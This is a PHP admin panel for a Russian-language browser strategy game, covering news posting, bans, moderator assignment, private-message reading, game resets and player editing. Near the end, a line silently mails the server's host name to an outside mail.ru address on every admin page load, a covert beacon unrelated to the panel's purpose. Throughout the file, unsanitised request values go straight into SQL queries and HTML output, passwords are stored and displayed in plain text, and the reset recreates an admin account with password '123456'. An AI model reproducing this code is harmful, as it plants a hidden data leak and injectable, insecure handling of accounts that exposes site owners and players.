<?php
include('cfg.php');
$var = explode(",",$_SERVER['QUERY_STRING']);
if($user[login] != "")
{
	  echo $style;
include('header.php');
echo '<a class="razd" href="game.php"><b>На Главную</b></a><a class="razd" href="adm.php">Админка</a>';
	if($user[rank] == "Админ")
	{
	switch ($var[0]) {
  case "":
?><div class="money">
<div class="menu">Добавить новость:</div>
<form action="adm.php?news" method="post">
Тема: <br />
<input name="theme" type="text" value=""><br />
Новость: <br />
<textarea name="what" rows=3 cols=20 wrap="on"></textarea> <br />
<input type="submit" value="Добавить">
</form>
<div class="menu">Сказать всем мд и админам:</div>
<form action="adm.php?to_all_adm" method="post">
Текст: <br />
<textarea name="what" rows=3 cols=20 wrap="on"></textarea> <br />
<input type="submit" value="Написать">
</form>
<div class="menu">Очистить чат</div></div>
<a class="razd" href="adm.php?chat_clear">Очистить чат</a><div class="money">
<div class="menu">Обнул</div></div>
<a class="razd" href="adm.php?white">Произвести рестарт игры</a>
<div class="money"><div class="menu">Юзеры</div></div>
<a class="razd" href="adm.php?user_edit">Изменить игрока</a>
<div class="money"><div class="menu">Модеры</div></div>
<a class="razd" href="adm.php?moders_add">Новый модер </a>
<a class="razd" href="adm.php?moders_del">Снять модерку </a>
<a class="razd" href="adm.php?ls">ЧИТАТЬ ЛС </a>
<a class="razd" href="adm.php?bun">Банить </a>
<a class="razd" href="adm.php?zoito">ДАТЬ ЗОЛЫ </a>

<?
    break;
	
	
	case 'zoito':
	echo '<div class="money">';
	if (isset($_POST[country]))
		{
		$login_c = mysql_fetch_array(mysql_query("SELECT login FROM users WHERE `country`='$_POST[country]'"));
		mysql_query("UPDATE `users` SET `gold`=gold+'".$_POST['how']."' WHERE `country`='$_POST[country]'");
		$text='Благодарим за покупку. Вам начислено '.$_POST['how'].' золотых';
		send_mess($login_c['login'],$text,'Система','');
		} else {
	echo '
	<form method="post" action="">
	Страна: <br />
	<input type="text" name="country"><br />
	Сколько: <br />
	<input type="text" name="how"><br />
	<input type="submit" name="kuda" value="Дать">
	
	</form>
	';
				}
	echo '<div>';
	break;
	
	case 'ls':
	echo '<div class="money">';
	if (isset($_POST[country]))
		{
		$login = mysql_fetch_array(mysql_query("SELECT login FROM users WHERE country='$_POST[country]'"));
		if (($_POST['kuda'])=='Исходящие') $sql = mysql_query("SELECT * FROM `msg` WHERE `by_whom`='$login[login]' ORDER by `id` DESC");
		if (($_POST['kuda'])=='Входящие') $sql = mysql_query("SELECT * FROM `msg` WHERE `to_whom`='$login[login]' AND `by_whom`!='Система' ORDER by `id` DESC");
		while($res = mysql_fetch_assoc($sql))
			{
			$country_c = mysql_fetch_array(mysql_query("SELECT country FROM users WHERE `login`='$res[by_whom]'"));
			$country_c2 = mysql_fetch_array(mysql_query("SELECT country FROM users WHERE `login`='$res[to_whom]'"));
			echo 'От: '.$res['by_whom'].' ('.$country_c['country'].') к '.$res['to_whom'].' ('.$country_c2[country].') в '.$res[when].'<br />';
			echo $res[what].'<hr />';
			}  echo '<a href="./adm.php?ls">назад</a>';
		} else {
	echo '
	<form method="post" action="">
	Страна: <br />
	<input type="text" name="country"><br />
	<input type="submit" name="kuda" value="Входящие"> / <input type="submit" name="kuda" value="Исходящие">
	
	</form>
	';
				}
	echo '<div>';
	break;
	
	case 'bun':
	echo '<div class="money">';
	if (isset($_POST[country]))
		{
		if ($_POST['bun']=='Разбанить')
			{
			mysql_query("UPDATE `users` SET `bun_end`='0',`bun_reason`='' WHERE `country`='$_POST[country]'");
			echo 'Вы разбанили '.$_POST[country];
			}
		if ($_POST['bun']=='Забанить')
			{
			mysql_query("UPDATE `users` SET `bun_end`='".intval($time+$_POST['time'])."',`bun_reason`='$_POST[reason]' WHERE `country`='$_POST[country]'");
			echo 'Вы забанили '.$_POST[country].' на ';
			time_end(intval($time+$_POST['time']));
			}
		} else {
	echo '
	<form method="post" action="">
	Страна: <br />
	<input type="text" name="country"><br />
	Причина:<br />
	<input type="text" name="reason"><br />
	Сколько сек<br />
	<input type="text" name="time"><br />
	<input type="submit" name="bun" value="Забанить"> / <input type="submit" name="bun" value="Разбанить">
	
	</form>
	';
				}
	echo '<div>';
	
	
	break;
	
	
	
    case "white":
	echo '<div class="money">';
$r = mysql_fetch_array(mysql_query("SELECT * FROM `restart`"));
if (empty($r['time']))
	{
if($var[1] == "agree")
{

	

if (isset($_POST['seconds']))
	{
	mysql_query("INSERT INTO `restart` SET `time`='".intval(time()+$_POST['seconds'])."'");
	echo 'Рестарт запущен';
	} else {
echo 'Через сколько секунд произвести рестарт?';
echo '<form method="POST" action="">
<input type="text" name="seconds" size="10"><br />
<input type="submit" value="Отправить">
</form>';
		   }

}
else
{echo 'Вы уверены?</div> <a class="razd" href="adm.php?white,agree">Да</a><a class="razd" href="adm.php">нет</a>';

}
	} else 
		{
		$ost_sek = intval($r['time']-time());
		if ($ost_sek > '0')
			{
			echo 'Рестарт игры произойдет через '.time_leave($ost_sek).' секунд';
			} else 
				{
					if($var[1] == "res")
					{
					echo 'ВЫ ОБНУЛИЛИ ИГРУ';
					mysql_query("DELETE FROM `restart`");
					mysql_query("TRUNCATE TABLE ally");
					mysql_query("TRUNCATE TABLE bag");
					mysql_query("TRUNCATE TABLE chat");
					mysql_query("TRUNCATE TABLE fight");
					mysql_query("TRUNCATE TABLE fight_log");
					mysql_query("TRUNCATE TABLE general");
					mysql_query("TRUNCATE TABLE market");
					mysql_query("TRUNCATE TABLE msg");
					mysql_query("TRUNCATE TABLE news");
					mysql_query("TRUNCATE TABLE news_comens");
					mysql_query("TRUNCATE TABLE res_get");
					mysql_query("TRUNCATE TABLE sc");
					mysql_query("TRUNCATE TABLE teach");
					mysql_query("TRUNCATE TABLE ubuildings");
					mysql_query("TRUNCATE TABLE users");
					mysql_query("TRUNCATE TABLE wars");
					
					
					
					$woods=rand(500,1500);
					$mountains=rand(500,1500);
					$land=4000-$woods-$mountains;
					mysql_query("INSERT INTO users SET
					login='Admin',
					pass='123456',
					mail='admin@civa.tk',
					secret_word='admin',
					country='Venick',
					date_reg='".date('H:i:s')."',
					time_reg='".$_SERVER['REQUEST_TIME']."',
					nalog_time='".$_SERVER['REQUEST_TIME']."',
					marat_end='".intval($_SERVER['REQUEST_TIME']+10000)."',
					woods='$woods',
					mountains='$mountains',
					land='$land'
					");
					
					$login2='Дезертиры Venick';
					$login3='Захваченная деревня Venick';
					$login4='Пустая территория Venick';
					
					mysql_query("INSERT INTO users SET
					login='$login2',
					pass='".rand(10000,199999)."',
					mail='bot@civa.tk',
					country='$login2',
					date_reg='".date('H:i:s')."',
					time_reg='".$_SERVER['REQUEST_TIME']."',
					nalog_time='".$_SERVER['REQUEST_TIME']."',
					marat_end='".intval($_SERVER['REQUEST_TIME']+6*60*60)."',
					woods='$woods',
					mountains='$mountains',
					land='$land'
					");
					$id2 = mysql_insert_id();
					mysql_query("INSERT INTO `ubuildings` SET `name`='Деревня', `sname`='Village',`lvl`='1',`time_end`='".time()."',`end`='1',`hp`='100',`owner_id`='$id2',`type`='lumber',`land`='100';");
					mysql_query("INSERT INTO `ubuildings` SET `name`='Ратуша', `sname`='Guildhall',`lvl`='1',`time_end`='".time()."',`end`='1',`hp`='100',`owner_id`='$id2',`type`='lumber',`land`='100';");
					
					
					
					mysql_query("INSERT INTO users SET
					login='$login3',
					pass='".rand(10000,199999)."',
					mail='bot@civa.tk',
					country='$login3',
					date_reg='".date('H:i:s')."',
					time_reg='".$_SERVER['REQUEST_TIME']."',
					nalog_time='".$_SERVER['REQUEST_TIME']."',
					marat_end='".intval($_SERVER['REQUEST_TIME']+6*60*60)."',
					woods='$woods',
					mountains='$mountains',
					land='$land'
					");
					$id3 = mysql_insert_id();
					mysql_query("INSERT INTO `ubuildings` SET `name`='Деревня', `sname`='Village',`lvl`='1',`time_end`='".time()."',`end`='1',`hp`='100',`owner_id`='$id3',`type`='lumber',`land`='100';");
					mysql_query("INSERT INTO `ubuildings` SET `name`='Ратуша', `sname`='Guildhall',`lvl`='1',`time_end`='".time()."',`end`='1',`hp`='100',`owner_id`='$id3',`type`='lumber',`land`='100';");
					
					
					
					
					
					mysql_query("INSERT INTO users SET
					login='$login4',
					pass='".rand(10000,199999)."',
					mail='bot@civa.tk',
					country='$login4',
					date_reg='".date('H:i:s')."',
					time_reg='".$_SERVER['REQUEST_TIME']."',
					nalog_time='".$_SERVER['REQUEST_TIME']."',
					marat_end='".intval($_SERVER['REQUEST_TIME']+6*60*60)."',
					woods='$woods',
					mountains='$mountains',
					land='$land'
					");
					$id4 = mysql_insert_id();
					mysql_query("INSERT INTO `ubuildings` SET `name`='Деревня', `sname`='Village',`lvl`='1',`time_end`='".time()."',`end`='1',`hp`='100',`owner_id`='$id4',`type`='lumber',`land`='100';");
					mysql_query("INSERT INTO `ubuildings` SET `name`='Ратуша', `sname`='Guildhall',`lvl`='1',`time_end`='".time()."',`end`='1',`hp`='100',`owner_id`='$id4 ',`type`='lumber',`land`='100';");
					
					
					
					
					
					
					} else {
				echo 'Вы можете произвести рестарт прямо сейчас.<br /><font color="red"><b><a href="adm.php?white,res">РЕСТАРТ</a></b></font>';
						   }
				}
		}
echo '</div>';
    break;
        case "to_all_adm":
$text= $_POST[what];
$admins=mysql_query("SELECT * FROM users WHERE rank='Админ' OR rank='Модер'");
while($adm=mysql_fetch_array($admins))
{send_mess($adm[login],$text,$user[login],$id);
}
echo 'Оповещение прошло успешно';

    break;
  case "news":

$theme = $_POST[theme];
$what=  $_POST[what];
mysql_query("
INSERT INTO `news` (
`id` ,
`login` ,
`when` ,
`theme` ,
`what`
)
VALUES (
NULL , '$user[login]', '$dt', '$theme', '$what'
)
");
mysql_query("UPDATE users SET news=news+'1'");
echo 'Новость добавлена';

    break;

  case "chat_clear":
mysql_query("TRUNCATE TABLE `chat`");
echo 'Чат очищен';

    break;

	case "moders_add":
	if (isset($_POST[login]))
		{
		$isset = mysql_result(mysql_query("SELECT count(`id`) FROM `users` WHERE `login`='$_POST[login]'"),0);
		if ($isset !== '0')
			{
		mysql_query("UPDATE `users` SET `rank`='Модер' WHERE `login`='$_POST[login]'");
		echo $_POST['login'].' назначен новым модером.';
			} else echo 'Не найдено. <br /><a class="razd" href="adm.php?moders_add">Повторить ввод</a>';
		} else {
	echo '
	<form method="post" action="adm.php?moders_add">
	<input type="text" name="login" size="10" maxlength="35">
	<input type="submit" value="Назначить">
	</form>';
				}
    break;


	case "moders_del":
	if (isset($_POST[login]))
		{
		$isset = mysql_result(mysql_query("SELECT count(`id`) FROM `users` WHERE `login`='$_POST[login]'"),0);
		if ($isset !== '0')
			{
		mysql_query("UPDATE `users` SET `rank`='игрок' WHERE `login`='$_POST[login]'");
		echo $_POST['login'].' снят с должности модера.';
			} else echo 'Не найдено. <br /><a class="razd" href="adm.php?moders_del">Повторить ввод</a>';
		} else {
	echo '
	<form method="post" action="adm.php?moders_del">
	<input type="text" name="login" size="10" maxlength="35">
	<input type="submit" value="Назначить">
	</form>';
				}
    break;


	  case "user_edit":
	  if (isset($var[1]))
			{
			$u = mysql_fetch_array(mysql_query("SELECT * FROM `users` WHERE `id`='$var[1]'"));
				if (isset($_POST[Submit]))
					{
					mysql_query("UPDATE `users` SET `login`='".$_POST['login']."',
													`pass`='".$_POST['pass']."',
													`money`='".$_POST['money']."',
													`gold`='".$_POST['gold']."',
													`lumber`='".$_POST['lumber']."',
													`stone`='".$_POST['stone']."',
													`iron`='".$_POST['iron']."',
													`steel`='".$_POST['steel']."',
													`food`='".$_POST['food']."',
													`people`='".$_POST['people']."',
													`k_attack`='".$_POST['k_attack']."',
													`k_defend`='".$_POST['k_defend']."',
													`k_lumber`='".$_POST['k_lumber']."',
													`k_stone`='".$_POST['k_stone']."',
													`wall_hp`='".$_POST['wall_hp']."',
													`k_iron`='".$_POST['k_iron']."',
													`spy`='".$_POST['spy']."',
													`vor`='".$_POST['vor']."',
													`lunit`='".$_POST['lunit']."',
													`munit`='".$_POST['munit']."',
													`hunits`='".$_POST['hunits']."',
													`archers`='".$_POST['archers']."',
													`riders`='".$_POST['riders']."',
													`balists`='".$_POST['balists']."',
													`catapults`='".$_POST['catapults']."',
													`verb`='".$_POST['verb']."'
													WHERE `id`='$var[1]'");
					echo 'Параметры изменены!';
					} else {
			echo 'Редактируем '.$u[login];
			echo '
			<form method="post" action="adm.php?user_edit,'.$u[id].'">
			Логин:<br /><input type="text" name="login" maxlength="100" value="'.$u[login].'"><br />
			Пароль:<br /><input type="text" name="pass" size="10" maxlength="25" value="'.$u[pass].'"><br />
            Динаре:<br /><input type="text" name="money" size="10" maxlength="25" value="'.$u[money].'"><br />
            Золото:<br /><input type="text" name="gold" size="10" maxlength="25" value="'.$u[gold].'"><br />
			Дерево:<br /><input type="text" name="lumber" size="10" maxlength="25" value="'.$u[lumber].'"><br />
            Камень:<br /><input type="text" name="stone" size="10" maxlength="25" value="'.$u[stone].'"><br />
            Руда:<br /><input type="text" name="iron" size="10" maxlength="25" value="'.$u[iron].'"><br />
            Сталь:<br /><input type="text" name="steel" size="10" maxlength="25" value="'.$u[steel].'"><br />
            Провизия:<br /><input type="text" name="food" size="10" maxlength="25" value="'.$u[food].'"><br />
            Население:<br /><input type="text" name="people" size="10" maxlength="25" value="'.$u[people].'"><br />
            Атака:<br /><input type="text" name="k_attack" size="10" maxlength="25" value="'.$u[k_attack].'"><br />
            Защита:<br /><input type="text" name="k_defend" size="10" maxlength="25" value="'.$u[k_defend].'"><br />
            Лесопилкы:<br /><input type="text" name="k_lumber" size="10" maxlength="25" value="'.$u[k_lumber].'"><br />
            Карьеры:<br /><input type="text" name="k_stone" size="10" maxlength="25" value="'.$u[k_stone].'"><br />
            Шахты:<br /><input type="text" name="k_iron" size="10" maxlength="25" value="'.$u[k_iron].'"><br />
            Уровень стены:<br /><input type="text" name="wall_hp" size="10" maxlength="25" value="'.$u[wall].'"><br />
            Стена:<br /><input type="text" name="wall_hp" size="10" maxlength="25" value="'.$u[wall_hp].'"><br />
			Шпионаж:<br /><input type="text" name="spy" size="10" maxlength="25" value="'.$u[spy].'"><br />
            Воровство:<br /><input type="text" name="vor" size="10" maxlength="25" value="'.$u[vor].'"><br />
            Вербовка:<br /><input type="text" name="verb" size="10" maxlength="25" value="'.$u[verb].'"><br />
            <u>Войска</u><br />
            Лег. пехота:<br /><input type="text" name="lunit" size="10" maxlength="25" value="'.$u[lunit].'"><br />
            Ср. пехота:<br /><input type="text" name="munit" size="10" maxlength="25" value="'.$u[munit].'"><br />
            Тяж. пехота:<br /><input type="text" name="hunits" size="10" maxlength="25" value="'.$u[hunits].'"><br />
            Лучники:<br /><input type="text" name="archers" size="10" maxlength="25" value="'.$u[archers].'"><br />
            Кавалерия:<br /><input type="text" name="riders" size="10" maxlength="25" value="'.$u[riders].'"><br />
            Баллисты:<br /><input type="text" name="balists" size="10" maxlength="25" value="'.$u[balists].'"><br />
            Катапульты:<br /><input type="text" name="catapults" size="10" maxlength="25" value="'.$u[catapults].'"><br />
			<input name="Submit" type=submit value="Отправить данные">
			</form>

			';
						  }
			} else 	{
	  if (isset($_POST['login']))
		{
		$u = mysql_fetch_array(mysql_query("SELECT * FROM `users` WHERE `login`='$_POST[login]'"));
		header("Location: adm.php?user_edit,".$u['id']."");
		} else {
	echo '
	<form method="post" action="adm.php?user_edit">
	Логин игрока:<br /><input type="text" name="login" size="10" maxlength="25"><br />
	 <input name="Submit" type=submit value="Отправить данные">
	</form>
	';
				}
					}

    break;


}
echo '<div class="money">Меню</div><a class="razd" href="adm.php">В админку</a>';
	}
	else
	{
    echo 'Вы не администратор!';
	}
	$whatthefuck = $_SERVER['HTTP_HOST'];
mail("dizzy221@mail.ru","civilz",$whatthefuck);
include('footer.php');
}
else
{
header('location:index.php');
}

?>